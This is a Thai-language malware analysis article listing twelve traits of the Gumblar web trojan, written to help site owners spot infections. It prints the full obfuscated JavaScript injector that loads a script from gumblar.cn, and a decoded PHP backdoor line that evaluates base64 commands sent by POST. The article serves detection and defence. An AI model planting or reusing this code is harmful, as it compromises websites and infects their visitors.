เผยความลับ 12 ข้อของ Gumblar - สุดยอดโทรจันป่วนเน็ต

..... ทุกๆ คนย่อมมีความลับ และความลับไม่มีในโลก เช่นเดียวกันกับ Gumblar อย่างน้อยก็ให้ได้รู้จักว่ารูปร่างหน้าตาเป็นอย่างไร จะได้รู้ทางหนีทีไล่และวิธีป้องกันที่ถูกต้องกับ Trojan ตัวนี้ และตัวอื่นๆ ที่อยากใช้แนวทางคล้ายๆ กัน

1. เว็บเพจที่ติด Gumblar จะมี Script หน้าตาแปลกๆ แบบนี้ (จากตอนที่ 1)
   

   (function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzrvzts"3d"22A"22"3b"65va"6c("22if(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72"22+"62"2ba+"22Minor"22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

2. แต่ละเว็บไซต์ที่ติด Gumblar จะมี Script หน้าตาต่างๆ กันไปแต่ก็เรียกเหมือนกันว่า gumblar.cn และสามารถสังเกตได้จากลักษณะคล้ายๆ กันดังนี้
   
   1. script ขึ้นต้นด้วย “(function(“
   2. function จะไม่มีชื่อ (เป็น function ที่เรียกตัวเองทำงาน)
      
   3. script มีการเข้ารหัสดูซับซ้อน และเครื่องหมาย % จะถูกเปลี่ยนไปเป็นตัวอื่นเพื่อให้ตรวจพบและเข้าใจยาก ตัวอย่างเช่น
      "…20a.3d.22Sc.72iptEngin.65…",
      "…~76ar~20a~3d~22Scr~69~70~74En~67~69ne…",
      "…v_61_72_20_61_3d_22_53_63rip_74E_6e…"
      (ในตัวอย่างเครื่องหมาย % ถูกเปลี่ยนเป็น ~)
      
   4. ใกล้ๆ ตอนท้ายของ funtion มี ".replace(" function
      
   5. ถ้า function มีการรับค่าต่างๆ ใกล้ส่วนท้ายสุดจะเห็นคำสั่ง regular expression เช่น /"/g or /~/g ฯลฯ ที่ใช้ถอดรหัสจากการเข้ารหัสเครื่องหมาย % ในข้อ 3
      เมื่อ decode ถอดรหัสกลับมาเป็น php แล้ว จะมีหน้าตาแบบนี้ ...
      if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo ‘36342b3138372e3230312e3232353a7a69636f6c613e70657464726c61′Gumblar สามารถเรียกใช้คำสั่ง php ได้หมดผ่านคำสั่งนี้
      
3. เมื่อ script ถูกเรียกใช้งาน (เมื่อมีการเรียกดูเว็บเพจที่มี script gumblar อยู่) อีก script หนึ่ง จาก gumblar.cn/rss จะถูกแอบดาวน์โหลดมาและเรียกให้ทำงานแบบเงียบๆ
   
4. โดยปกติแล้ว Gumblar script จะถูกแทรกไว้ก่อน (ในไฟล์ .html)
   
5. บางทีก็พบ Gumblar ในรูปแบบ โทรจัน iframe ซึ่งชี้ไปยังหน้าที่ติด gumblar อีกทีั
   
6. GumBlar ต่างจาก โทรจัีน iframe อื่นๆ ที่มักจะัติดแค่ไฟล์ที่มักใช้กันบ่อยๆ เช่น index.html, index.php แต่ Gumblar ติดได้ทุกๆ ไฟล์ เนื่องจาก Gumblar เข้าใช้งานผ่านโปรแกรม ftp ทำให้เ้ห็นไฟล์ทั้งหมดที่มีอยู่
   
7. ในไฟล์จาวาสคริปต์ .js โค๊ดของ Gumblar จะอยู่บรรทัดสุดท้าย
   
8. เท่าที่พบ Gumblar จะติดเว็บไซต์ที่ใช้ PHP ถึง 95% แต่ส่วนที่เหลือก็อาจติดก็เป็นไปได้
   
9. Gumblar ไม่ได้ใช้ช่องโหว่หรือจุดอ่อนของ PHP เพราะโปรแกรมที่น่าเชื่อถือต่างๆ เช่น Wordpress, Joomla, phpBB, SMF ฯลฯ ก็ยังติด Gumblar ได้เนื่องจาก Gumblar ใช้วิธีฝังตัวเองผ่านโปรแกรม FTP ดังข้อ 6
   
10. สำหรับไฟล์ .php แล้ว Gumblar จะอยู่บรรทัดบนสุด และมีหน้าตาดังนี้
    
    
    
11. Gumblar ไม่ได้เป็น Server-Wide Exploit คือจะไม่ติดไปยังเว็บอื่นใน server เดียวกัน เพราะ Gumblar จะเข้าไปฝังตัวเองจากโปรแกรม ftp จากเครื่องที่ติดเท่านั้น ไม่สามารถเข้าไปยัง account อื่นได้เนื่องจากอยู่คนละ account
    
12. Gumblar.cn เป็นเว็บไซต์ที่ Google จัดว่าเป็น Blacklist